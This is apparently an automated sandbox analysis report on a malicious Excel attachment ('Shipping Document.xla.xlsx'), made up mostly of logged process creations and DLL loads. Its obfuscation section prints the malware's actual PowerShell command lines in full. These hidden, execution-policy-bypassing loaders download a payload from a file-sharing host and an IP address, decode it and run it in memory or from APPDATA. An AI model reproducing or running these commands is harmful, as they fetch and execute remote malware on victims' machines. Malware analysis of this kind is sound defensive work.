      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"Jump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\cfogy1ty\cfogy1ty.pdb source: powershell.exe, 00000005.00000002.530318649.00000000037A6000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\cfogy1ty\cfogy1ty.pdbhP source: powershell.exe, 00000005.00000002.530318649.00000000037A6000.00000004.00000800.00020000.00000000.sdmp
      Source: 02B30000.0.drInitial sample: OLE indicators vbamacros = False
      Source: Shipping Document.xla.xlsxInitial sample: OLE indicators encrypted = True

      Data Obfuscation

      barindex
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $PShomE[4]+$pShoMe[30]+'X')(('e3'+'Iimag'+'eUrl = Heuhttps://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_'+'0xCy-xl4tnxlAVbQ95-dviTK'+'5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Heu;e3IwebClient = New-Object System.Net.WebClient;e3Iima'+'geByte'+'s = e3IwebClient.DownloadData(e3IimageUrl);e3IimageText = [System.Text.Encoding'+']::UTF8.GetString(e3IimageBytes'+');e3Ista'+'rtFlag'+' = Heu<<BASE64_START>>Heu;e3IendFlag ='+' H'+'eu<<BASE64_END>>Heu;e3IstartIndex = e3IimageText.IndexOf(e3IstartFlag);e3IendIndex = e3IimageText.IndexOf(e3IendFlag);e3IstartIn'+'dex -ge 0 -and e3IendIndex -'+'gt e3IstartIndex;e3I'+'startIndex += e3Istart'+'Flag.Le'+'ngth;e3Ibase64Length = e3IendIndex - e3IstartIndex;e3'+'Ibase64Command = e3IimageText'+'.Substring(e3IstartIndex, e3Ibase64Length);e3Ibase64Re'+'v'+'e'+'rsed = -join (e3Ibase64Command.ToCh'+'arArray() kUi ForEach-Object { e3I_ })[-1..-(e3Ibase64Command.Length)];e3I'+'com'+'mandBytes = [System.'+'Convert]::FromBase64String(e'+'3Iba'+'se64Reversed);e3'+'Iloade'+'dAssembly = [Syste'+'m.R'+'eflection.Assembly]::Load(e3'+'IcommandBytes);e3IvaiMethod '+'= [dnlib.IO.Home].GetMethod(HeuVAIHeu);e3IvaiMethod.Invoke(e3Inull, @(Heutxt'+'.MRMAC/1231/571.44.271.701//:ptthHeu, HeudesativadoHeu, Heudesat'+'ivadoHeu, '+'HeudesativadoHeu, HeuCasPolHeu, HeudesativadoHeu, HeudesativadoHeu,He'+'udesativado'+'Heu,HeudesativadoHeu,HeudesativadoHeu,HeudesativadoHeu,HeudesativadoHeu,Heu1Heu,Heud'+'esativadoH'+'eu));').rEPlaCE(([cHAR]72+[cHAR]101+[cHAR]117),[STRING][cHAR]39).rEPlaCE(([cHAR]107+[cHAR]85+[cHAR]105),[STRING][cHAR]124).rEPlaCE('e3I','$') )"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $PShomE[4]+$pShoMe[30]+'X')(('e3'+'Iimag'+'eUrl = Heuhttps://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_'+'0xCy-xl4tnxlAVbQ95-dviTK'+'5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Heu;e3IwebClient = New-Object System.Net.WebClient;e3Iima'+'geByte'+'s = e3IwebClient.DownloadData(e3IimageUrl);e3IimageText = [System.Text.Encoding'+']::UTF8.GetString(e3IimageBytes'+');e3Ista'+'rtFlag'+' = Heu<<BASE64_START>>Heu;e3IendFlag ='+' H'+'eu<<BASE64_END>>Heu;e3IstartIndex = e3IimageText.IndexOf(e3IstartFlag);e3IendIndex = e3IimageText.IndexOf(e3IendFlag);e3IstartIn'+'dex -ge 0 -and e3IendIndex -'+'gt e3IstartIndex;e3I'+'startIndex += e3Istart'+'Flag.Le'+'ngth;e3Ibase64Length = e3IendIndex - e3IstartIndex;e3'+'Ibase64Command = e3IimageText'+'.Substring(e3IstartIndex, e3Ibase64Length);e3Ibase64Re'+'v'+'e'+'rsed = -join (e3Ibase64Command.ToCh'+'arArray() kUi ForEach-Object { e3I_ })[-1..-(e3Ibase64Command.Length)];e3I'+'com'+'mandBytes = [System.'+'Convert]::FromBase64String(e'+'3Iba'+'se64Reversed);e3'+'Iloade'+'dAssembly = [Syste'+'m.R'+'eflection.Assembly]::Load(e3'+'IcommandBytes);e3IvaiMethod '+'= [dnlib.IO.Home].GetMethod(HeuVAIHeu);e3IvaiMethod.Invoke(e3Inull, @(Heutxt'+'.MRMAC/1231/571.44.271.701//:ptthHeu, HeudesativadoHeu, Heudesat'+'ivadoHeu, '+'HeudesativadoHeu, HeuCasPolHeu, HeudesativadoHeu, HeudesativadoHeu,He'+'udesativado'+'Heu,HeudesativadoHeu,HeudesativadoHeu,HeudesativadoHeu,HeudesativadoHeu,Heu1Heu,Heud'+'esativadoH'+'eu));').rEPlaCE(([cHAR]72+[cHAR]101+[cHAR]117),[STRING][cHAR]39).rEPlaCE(([cHAR]107+[cHAR]85+[cHAR]105),[STRING][cHAR]124).rEPlaCE('e3I','$') )"Jump to behavior
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYStEM32\WinDoWspowERshElL\V1.0\POwersHell.ExE" "poWERsHeLL.eXe -ex bYPass -nOp -W 1 -C dEVICEcredENTIaLDepLoYMEnT.EXe ; iEX($(iEx('[SYsTEm.tExT.EncOdINg]'+[cHAr]0x3a+[CHar]58+'UtF8.gETSTRINg([SysTem.CONVERT]'+[CHar]58+[cHAr]58+'Frombase64sTriNG('+[CHAr]0x22+'JEpQemwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtYkVyZEVmaU5pVGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByVkZQY0wsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ09OZ0J5LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhhLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtaEJPLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZQT0VmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaXF3USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUZIU21reVdJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRKUHpsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMTMyMS9zZWV0aGViZXN0dGhpbmdzZW50aXJldGltZXdoaWNoZ2l2ZW5iZXN0ZGVzaWduZm9yeW91cnRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aGljaGdpdmVuYmVzdGRlc2lnbmZvcnlvdXJ0aC52QnMiLDAsMCk7c1RBcnQtc2xlRXAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2hpY2hnaXZlbmJlc3RkZXNpZ25mb3J5b3VydGgudkJzIg=='+[cHAr]0X22+'))')))"
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYStEM32\WinDoWspowERshElL\V1.0\POwersHell.ExE" "poWERsHeLL.eXe -ex bYPass -nOp -W 1 -C dEVICEcredENTIaLDepLoYMEnT.EXe ; iEX($(iEx('[SYsTEm.tExT.EncOdINg]'+[cHAr]0x3a+[CHar]58+'UtF8.gETSTRINg([SysTem.CONVERT]'+[CHar]58+[cHAr]58+'Frombase64sTriNG('+[CHAr]0x22+'JEpQemwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtYkVyZEVmaU5pVGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByVkZQY0wsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ09OZ0J5LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhhLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtaEJPLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZQT0VmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaXF3USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUZIU21reVdJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRKUHpsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMTMyMS9zZWV0aGViZXN0dGhpbmdzZW50aXJldGltZXdoaWNoZ2l2ZW5iZXN0ZGVzaWduZm9yeW91cnRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aGljaGdpdmVuYmVzdGRlc2lnbmZvcnlvdXJ0aC52QnMiLDAsMCk7c1RBcnQtc2xlRXAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2hpY2hnaXZlbmJlc3RkZXNpZ25mb3J5b3VydGgudkJzIg=='+[cHAr]0X22+'))')))"Jump to behavior
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYStEM32\WinDoWspowERshElL\V1.0\POwersHell.ExE" "poWERsHeLL.eXe -ex bYPass -nOp -W 1 -C dEVICEcredENTIaLDepLoYMEnT.EXe ; iEX($(iEx('[SYsTEm.tExT.EncOdINg]'+[cHAr]0x3a+[CHar]58+'UtF8.gETSTRINg([SysTem.CONVERT]'+[CHar]58+[cHAr]58+'Frombase64sTriNG('+[CHAr]0x22+'JEpQemwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtYkVyZEVmaU5pVGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByVkZQY0wsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ09OZ0J5LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhhLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtaEJPLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZQT0VmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaXF3USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRXNQYUNlICAgICAgICAgICAg